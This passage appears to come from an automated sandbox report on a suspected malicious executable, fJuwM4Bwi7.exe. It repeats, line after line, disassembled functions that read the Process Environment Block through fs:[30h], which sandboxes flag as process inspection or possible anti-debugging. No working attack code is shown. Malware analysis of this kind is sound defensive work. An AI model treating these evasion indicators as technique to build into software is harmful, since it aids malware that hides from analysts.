        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329182E0 mov eax, dword ptr fs:[00000030h]8_2_329182E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329182E0 mov eax, dword ptr fs:[00000030h]8_2_329182E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329182E0 mov eax, dword ptr fs:[00000030h]8_2_329182E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329182E0 mov eax, dword ptr fs:[00000030h]8_2_329182E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290D2EC mov eax, dword ptr fs:[00000030h]8_2_3290D2EC
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290D2EC mov eax, dword ptr fs:[00000030h]8_2_3290D2EC
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290821B mov eax, dword ptr fs:[00000030h]8_2_3290821B
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3299B214 mov eax, dword ptr fs:[00000030h]8_2_3299B214
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3299B214 mov eax, dword ptr fs:[00000030h]8_2_3299B214
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290A200 mov eax, dword ptr fs:[00000030h]8_2_3290A200
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32930230 mov ecx, dword ptr fs:[00000030h]8_2_32930230
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32990227 mov eax, dword ptr fs:[00000030h]8_2_32990227
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32990227 mov eax, dword ptr fs:[00000030h]8_2_32990227
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32990227 mov eax, dword ptr fs:[00000030h]8_2_32990227
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294A22B mov eax, dword ptr fs:[00000030h]8_2_3294A22B
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294A22B mov eax, dword ptr fs:[00000030h]8_2_3294A22B
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294A22B mov eax, dword ptr fs:[00000030h]8_2_3294A22B
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293F24A mov eax, dword ptr fs:[00000030h]8_2_3293F24A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329CF247 mov eax, dword ptr fs:[00000030h]8_2_329CF247
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290B273 mov eax, dword ptr fs:[00000030h]8_2_3290B273
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290B273 mov eax, dword ptr fs:[00000030h]8_2_3290B273
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290B273 mov eax, dword ptr fs:[00000030h]8_2_3290B273
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A327E mov eax, dword ptr fs:[00000030h]8_2_329A327E
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A327E mov eax, dword ptr fs:[00000030h]8_2_329A327E
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A327E mov eax, dword ptr fs:[00000030h]8_2_329A327E
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A327E mov eax, dword ptr fs:[00000030h]8_2_329A327E
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A327E mov eax, dword ptr fs:[00000030h]8_2_329A327E
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329A327E mov eax, dword ptr fs:[00000030h]8_2_329A327E
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329CD270 mov eax, dword ptr fs:[00000030h]8_2_329CD270
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293A390 mov eax, dword ptr fs:[00000030h]8_2_3293A390
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293A390 mov eax, dword ptr fs:[00000030h]8_2_3293A390
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293A390 mov eax, dword ptr fs:[00000030h]8_2_3293A390
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32911380 mov eax, dword ptr fs:[00000030h]8_2_32911380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32911380 mov eax, dword ptr fs:[00000030h]8_2_32911380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32911380 mov eax, dword ptr fs:[00000030h]8_2_32911380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32911380 mov eax, dword ptr fs:[00000030h]8_2_32911380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32911380 mov eax, dword ptr fs:[00000030h]8_2_32911380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292F380 mov eax, dword ptr fs:[00000030h]8_2_3292F380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292F380 mov eax, dword ptr fs:[00000030h]8_2_3292F380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292F380 mov eax, dword ptr fs:[00000030h]8_2_3292F380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292F380 mov eax, dword ptr fs:[00000030h]8_2_3292F380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292F380 mov eax, dword ptr fs:[00000030h]8_2_3292F380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292F380 mov eax, dword ptr fs:[00000030h]8_2_3292F380
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329CF38A mov eax, dword ptr fs:[00000030h]8_2_329CF38A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298C3B0 mov eax, dword ptr fs:[00000030h]8_2_3298C3B0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329193A6 mov eax, dword ptr fs:[00000030h]8_2_329193A6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329193A6 mov eax, dword ptr fs:[00000030h]8_2_329193A6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329433D0 mov eax, dword ptr fs:[00000030h]8_2_329433D0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329443D0 mov ecx, dword ptr fs:[00000030h]8_2_329443D0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329943D5 mov eax, dword ptr fs:[00000030h]8_2_329943D5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290E3C0 mov eax, dword ptr fs:[00000030h]8_2_3290E3C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290E3C0 mov eax, dword ptr fs:[00000030h]8_2_3290E3C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290E3C0 mov eax, dword ptr fs:[00000030h]8_2_3290E3C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290C3C7 mov eax, dword ptr fs:[00000030h]8_2_3290C3C7
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329163CB mov eax, dword ptr fs:[00000030h]8_2_329163CB
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292E310 mov eax, dword ptr fs:[00000030h]8_2_3292E310
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292E310 mov eax, dword ptr fs:[00000030h]8_2_3292E310
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292E310 mov eax, dword ptr fs:[00000030h]8_2_3292E310
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32909303 mov eax, dword ptr fs:[00000030h]8_2_32909303
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32909303 mov eax, dword ptr fs:[00000030h]8_2_32909303
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329CF30A mov eax, dword ptr fs:[00000030h]8_2_329CF30A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E3336 mov eax, dword ptr fs:[00000030h]8_2_329E3336
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290E328 mov eax, dword ptr fs:[00000030h]8_2_3290E328
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290E328 mov eax, dword ptr fs:[00000030h]8_2_3290E328
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290E328 mov eax, dword ptr fs:[00000030h]8_2_3290E328
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293332D mov eax, dword ptr fs:[00000030h]8_2_3293332D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32908347 mov eax, dword ptr fs:[00000030h]8_2_32908347
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32908347 mov eax, dword ptr fs:[00000030h]8_2_32908347
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32908347 mov eax, dword ptr fs:[00000030h]8_2_32908347
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32990371 mov eax, dword ptr fs:[00000030h]8_2_32990371
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32990371 mov eax, dword ptr fs:[00000030h]8_2_32990371
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293237A mov eax, dword ptr fs:[00000030h]8_2_3293237A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298E372 mov eax, dword ptr fs:[00000030h]8_2_3298E372
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298E372 mov eax, dword ptr fs:[00000030h]8_2_3298E372
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298E372 mov eax, dword ptr fs:[00000030h]8_2_3298E372
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3298E372 mov eax, dword ptr fs:[00000030h]8_2_3298E372
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291B360 mov eax, dword ptr fs:[00000030h]8_2_3291B360
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291B360 mov eax, dword ptr fs:[00000030h]8_2_3291B360
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291B360 mov eax, dword ptr fs:[00000030h]8_2_3291B360
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291B360 mov eax, dword ptr fs:[00000030h]8_2_3291B360
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291B360 mov eax, dword ptr fs:[00000030h]8_2_3291B360
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291B360 mov eax, dword ptr fs:[00000030h]8_2_3291B360
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E363 mov eax, dword ptr fs:[00000030h]8_2_3294E363
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E363 mov eax, dword ptr fs:[00000030h]8_2_3294E363
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E363 mov eax, dword ptr fs:[00000030h]8_2_3294E363
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E363 mov eax, dword ptr fs:[00000030h]8_2_3294E363
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E363 mov eax, dword ptr fs:[00000030h]8_2_3294E363
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E363 mov eax, dword ptr fs:[00000030h]8_2_3294E363
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E363 mov eax, dword ptr fs:[00000030h]8_2_3294E363
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E363 mov eax, dword ptr fs:[00000030h]8_2_3294E363
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290C090 mov eax, dword ptr fs:[00000030h]8_2_3290C090
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290A093 mov ecx, dword ptr fs:[00000030h]8_2_3290A093
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E4080 mov eax, dword ptr fs:[00000030h]8_2_329E4080
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E4080 mov eax, dword ptr fs:[00000030h]8_2_329E4080
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E4080 mov eax, dword ptr fs:[00000030h]8_2_329E4080
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E4080 mov eax, dword ptr fs:[00000030h]8_2_329E4080
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E4080 mov eax, dword ptr fs:[00000030h]8_2_329E4080
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E4080 mov eax, dword ptr fs:[00000030h]8_2_329E4080
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E4080 mov eax, dword ptr fs:[00000030h]8_2_329E4080
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E50B7 mov eax, dword ptr fs:[00000030h]8_2_329E50B7
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329500A5 mov eax, dword ptr fs:[00000030h]8_2_329500A5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329CB0AF mov eax, dword ptr fs:[00000030h]8_2_329CB0AF
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329BF0A5 mov eax, dword ptr fs:[00000030h]8_2_329BF0A5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329BF0A5 mov eax, dword ptr fs:[00000030h]8_2_329BF0A5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329BF0A5 mov eax, dword ptr fs:[00000030h]8_2_329BF0A5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329BF0A5 mov eax, dword ptr fs:[00000030h]8_2_329BF0A5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329BF0A5 mov eax, dword ptr fs:[00000030h]8_2_329BF0A5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329BF0A5 mov eax, dword ptr fs:[00000030h]8_2_329BF0A5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329BF0A5 mov eax, dword ptr fs:[00000030h]8_2_329BF0A5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3292B0D0 mov eax, dword ptr fs:[00000030h]8_2_3292B0D0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290B0D6 mov eax, dword ptr fs:[00000030h]8_2_3290B0D6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290B0D6 mov eax, dword ptr fs:[00000030h]8_2_3290B0D6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290B0D6 mov eax, dword ptr fs:[00000030h]8_2_3290B0D6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290B0D6 mov eax, dword ptr fs:[00000030h]8_2_3290B0D6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294D0F0 mov eax, dword ptr fs:[00000030h]8_2_3294D0F0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294D0F0 mov ecx, dword ptr fs:[00000030h]8_2_3294D0F0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290C0F6 mov eax, dword ptr fs:[00000030h]8_2_3290C0F6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329090F8 mov eax, dword ptr fs:[00000030h]8_2_329090F8
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329090F8 mov eax, dword ptr fs:[00000030h]8_2_329090F8
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329090F8 mov eax, dword ptr fs:[00000030h]8_2_329090F8
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329090F8 mov eax, dword ptr fs:[00000030h]8_2_329090F8
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32935004 mov eax, dword ptr fs:[00000030h]8_2_32935004
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32935004 mov ecx, dword ptr fs:[00000030h]8_2_32935004
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32918009 mov eax, dword ptr fs:[00000030h]8_2_32918009
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290D02D mov eax, dword ptr fs:[00000030h]8_2_3290D02D
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32911051 mov eax, dword ptr fs:[00000030h]8_2_32911051
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32911051 mov eax, dword ptr fs:[00000030h]8_2_32911051
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E505B mov eax, dword ptr fs:[00000030h]8_2_329E505B
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32940044 mov eax, dword ptr fs:[00000030h]8_2_32940044
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32917072 mov eax, dword ptr fs:[00000030h]8_2_32917072
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32916074 mov eax, dword ptr fs:[00000030h]8_2_32916074
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32916074 mov eax, dword ptr fs:[00000030h]8_2_32916074
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329B9060 mov eax, dword ptr fs:[00000030h]8_2_329B9060
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32951190 mov eax, dword ptr fs:[00000030h]8_2_32951190
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32951190 mov eax, dword ptr fs:[00000030h]8_2_32951190
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32939194 mov eax, dword ptr fs:[00000030h]8_2_32939194
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32914180 mov eax, dword ptr fs:[00000030h]8_2_32914180
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32914180 mov eax, dword ptr fs:[00000030h]8_2_32914180
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32914180 mov eax, dword ptr fs:[00000030h]8_2_32914180
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329E51B6 mov eax, dword ptr fs:[00000030h]8_2_329E51B6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329431BE mov eax, dword ptr fs:[00000030h]8_2_329431BE
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329431BE mov eax, dword ptr fs:[00000030h]8_2_329431BE
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329441BB mov ecx, dword ptr fs:[00000030h]8_2_329441BB
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329441BB mov eax, dword ptr fs:[00000030h]8_2_329441BB
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329441BB mov eax, dword ptr fs:[00000030h]8_2_329441BB
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E1A4 mov eax, dword ptr fs:[00000030h]8_2_3294E1A4
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3294E1A4 mov eax, dword ptr fs:[00000030h]8_2_3294E1A4
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329201C0 mov eax, dword ptr fs:[00000030h]8_2_329201C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329201C0 mov eax, dword ptr fs:[00000030h]8_2_329201C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329251C0 mov eax, dword ptr fs:[00000030h]8_2_329251C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329251C0 mov eax, dword ptr fs:[00000030h]8_2_329251C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329251C0 mov eax, dword ptr fs:[00000030h]8_2_329251C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329251C0 mov eax, dword ptr fs:[00000030h]8_2_329251C0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329091F0 mov eax, dword ptr fs:[00000030h]8_2_329091F0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329091F0 mov eax, dword ptr fs:[00000030h]8_2_329091F0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329201F1 mov eax, dword ptr fs:[00000030h]8_2_329201F1
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329201F1 mov eax, dword ptr fs:[00000030h]8_2_329201F1
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329201F1 mov eax, dword ptr fs:[00000030h]8_2_329201F1
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293F1F0 mov eax, dword ptr fs:[00000030h]8_2_3293F1F0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293F1F0 mov eax, dword ptr fs:[00000030h]8_2_3293F1F0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291A1E3 mov eax, dword ptr fs:[00000030h]8_2_3291A1E3
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291A1E3 mov eax, dword ptr fs:[00000030h]8_2_3291A1E3
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291A1E3 mov eax, dword ptr fs:[00000030h]8_2_3291A1E3
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291A1E3 mov eax, dword ptr fs:[00000030h]8_2_3291A1E3
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3291A1E3 mov eax, dword ptr fs:[00000030h]8_2_3291A1E3
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329D81EE mov eax, dword ptr fs:[00000030h]8_2_329D81EE
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329D81EE mov eax, dword ptr fs:[00000030h]8_2_329D81EE
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293B1E0 mov eax, dword ptr fs:[00000030h]8_2_3293B1E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293B1E0 mov eax, dword ptr fs:[00000030h]8_2_3293B1E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293B1E0 mov eax, dword ptr fs:[00000030h]8_2_3293B1E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293B1E0 mov eax, dword ptr fs:[00000030h]8_2_3293B1E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293B1E0 mov eax, dword ptr fs:[00000030h]8_2_3293B1E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293B1E0 mov eax, dword ptr fs:[00000030h]8_2_3293B1E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293B1E0 mov eax, dword ptr fs:[00000030h]8_2_3293B1E0
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329191E5 mov eax, dword ptr fs:[00000030h]8_2_329191E5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329191E5 mov eax, dword ptr fs:[00000030h]8_2_329191E5
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_329081EB mov eax, dword ptr fs:[00000030h]8_2_329081EB
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3290F113 mov eax, dword ptr fs:[00000030h]8_2_3290F113
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_32940118 mov eax, dword ptr fs:[00000030h]8_2_32940118
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 8_2_3293510F mov eax, dword ptr fs:[00000030h]8_2_3293510F
